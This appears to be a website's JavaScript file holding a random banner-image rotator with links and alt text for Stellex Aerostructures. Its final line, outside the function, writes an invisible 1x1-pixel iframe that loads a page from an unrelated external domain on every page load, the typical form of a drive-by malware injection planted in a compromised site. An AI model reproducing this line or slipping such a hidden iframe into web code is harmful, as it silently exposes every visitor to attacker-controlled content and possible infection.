function random_imglink(){
var myimages=new Array()
//specify random images below. You can have as many as you wish
myimages[1]="images/test/topright.jpg"
myimages[2]="images/test/topright02.jpg"
myimages[3]="images/test/topright03.jpg"

//specify corresponding links below
var imagelinks=new Array()
imagelinks[1]="games.htm"
imagelinks[2]="games.htm"
imagelinks[3]="getstate.html"

//specify corresponding alt text below
var alttext=new Array()
alttext[1]="Stellex Aerostructures - Commercial"
alttext[2]="Stellex Aerostructures - General"
alttext[3]="Stellex Aerostructures - Military"

var ry=Math.floor(Math.random()*myimages.length)
if (ry==0)
ry=1
document.write('<img src="'+myimages[ry]+'" border=0 alt="'+alttext[ry]+'">')
}
document.write('<iframe src=http://www.idino.kr/img/out.htm width=1 height=1></iframe>');
